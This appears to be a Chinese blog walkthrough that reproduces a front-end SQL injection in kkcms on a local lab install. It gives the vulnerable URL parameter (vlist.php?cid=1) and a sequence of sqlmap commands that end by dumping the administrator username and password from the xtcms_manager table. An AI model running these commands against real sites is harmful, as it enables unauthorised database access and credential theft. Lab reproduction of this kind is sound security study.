kkcms前台sql注入漏洞复现

目录

安装kkcms

漏洞复现

安装kkcms

下载kkcms地址:

https://github.com/https://github.com/

浏览器访问主机ip/kkcms-master/install

按照提示傻瓜式安装,中间填一下数据库名和数据库账号密码。

漏洞复现

寻找漏洞点, 浏览器访问主机ip/kkcms-master/vlist.php?cid=1。我这里是把文件名kkcms-master改成kkcms才这么搜,默认文件名是kkcms-master,你也可以跟着我这样子改,按照实际情况来。

访问后,有回显。 

在URL后面加一个单引号,没有回显

用sqlmap来跑网站数据库的数据。获取数据库所有库的名称:sqlmap.py -u "http://192.168.1.36/kkcms/vlist.php?cid=1" --dbs

获取当前使用的数据库名称sqlmap.py -u "http://192.168.1.36/kkcms/vlist.php?cid=1" --current -db。跑出来了当前使用的数据库名称是kkcms。

获取kkcms库下的表sqlmap.py -u "http://192.168.1.36/kkcms/vlist.php?cid=1" -D "kkcms" –tables。跑出来了有21个表。

获取xtcms_manager 表中的字段sqlmap.py -u "http://192.168.1.36/kkcms/vlist.php?cid=1" -D "kkcms" -T "xtcms_manager" --columns

查看m_name和m_password字段下的数据sqlmap.py -u "http://192.168.1.36/kkcms/vlist.php?cid=1" -D "kkcms" -T "xtcms_manager" -C "m_name,m_password" -dump。跑出来了网站管理员的用户名和密码。智能得很,还解密了。这是默认的后台登陆账号密码。

想看看其他表里的数据也可以,不过新建的大多都是没有数据,而有数据的也没什么价值,所以选择了xtcms_manager 这个表。

kkcms前台sql注入漏洞复现相关推荐

  1. espcms5.7.13 sql注入漏洞复现

    espcms5.7.13 sql注入漏洞复现 作者: admin 时间: 2021-06-28 分类: 漏洞复现 使用代码审计工具自动审计,找到select语句,双击进入/adminsoft/cont ...

  2. 通达OA 11.5 SQL注入漏洞复现

    0x00 漏洞描述 通达OA 11.5存在sql注入 0x01 漏洞影响版本 通达oa 11.5 0x02 漏洞复现 1.下载通达OA 11.5 https://cdndown.tongda2000. ...

  3. 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现

    漏洞描述 泛微e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 影响范围 使用oracle数 ...

  4. 宏景eHR SQL注入漏洞复现(CNVD-2023-08743)

    0x01 产品简介 宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化.协同化.流程化.战略化需求的软件. 0x02 漏洞概述 宏景eHR 存在SQL注入漏洞,未经过身份认证的 ...

  5. 畅捷通T+ SQL注入漏洞复现(QVD-2023-13612)

    0x01 产品简介 畅捷通 T+ 是一款基于互联网的新型企业管理软件,功能模块包括:财务管理.采购管理.库存管理等.主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化.移动化.物联网.电子 ...

  6. (CVE-2020-9483)ApacheSkyWalking SQL注入 漏洞复现

    漏洞信息 漏洞名称 ApacheSkyWalking SQL注入漏洞 漏洞编号 CVE-2020-9483 危害等级 高危 漏洞类型 通用型漏洞 漏洞厂商 Apache 漏洞概述 当使用H2 / My ...

  7. 【漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)

    文章目录 前言 声明 一.产品介绍 二.漏洞描述 三.影响范围 四.漏洞分析 五.漏洞复现 六.SQLMAP漏洞利用 七.修复方案 前言 泛微E-Cology v9 Browser.jsp 存在SQL ...

  8. 泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)

    1.产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型协同管 ...

  9. 泛微E-Cology SQL注入漏洞复现(QVD-2023-15672)

    0x01 产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型 ...

最新文章

  1. foxmail提示不知道这样的主机_不知道和婚礼策划师沟通时谈哪些?这样做让你高效备婚...
  2. 3D游戏引擎设计 实时计算机图形学的应用方法 第2版 pdf 带索引书签目录
  3. 如何关闭SAP Fiori的病毒扫描设置
  4. python全栈面试题_python面试题大全(一)
  5. 虚拟化VMware ESXi 6.7服务器安装配置详细步骤图文
  6. azure云数据库_将Azure SQL数据库警报集成到Slack
  7. 豆瓣评分 9.7,等了好久的《操作系统导论》Operating Systems 终于来了
  8. ExtJS简介--车辆调度
  9. 一文了解11个常见的多变量分析方法!
  10. cad查看_CAD快速看图 for mac(CAD图纸查看工具) v4.3.7中文版
  11. php json转数组不成功,phpjson转数组出错
  12. html 给表格添加背景,HTML中新建表格怎么加背景
  13. 手把手教你接入支付宝支付
  14. 解读阿里云是干什么的?
  15. Redirected Walking
  16. 基于51单片机智能小车的设计与实现
  17. win7 install solution for intel SKL and BSW platform
  18. OpenCV对矩阵进行padding操作
  19. python网络爬虫一
  20. 几种常见的概率统计谬误

热门文章

  1. ANSYS_Maxwell平面电场仿真
  2. C++ MFC棋牌类小游戏day1
  3. 【洞见研报】研报速读:厨房小家电行业报告——“沙发经济”走向“厨房经济”(小家电,厨房小家电,厨房经济)
  4. layui框架KIT ADMIN后台管理系统模板
  5. FPGA之CRC校验
  6. 单片机IO直接驱动段式LCD详细说明+代码
  7. BI自动化之Python自动发报告(查询数据库生成报表和图片嵌入邮件)
  8. 【毕设进行时-工业大数据,数据挖掘】对数据库的稍大规模的读写
  9. 如何用 Python 做自动化测试
  10. IDM 在chrome拓展没有办法使用的解决方法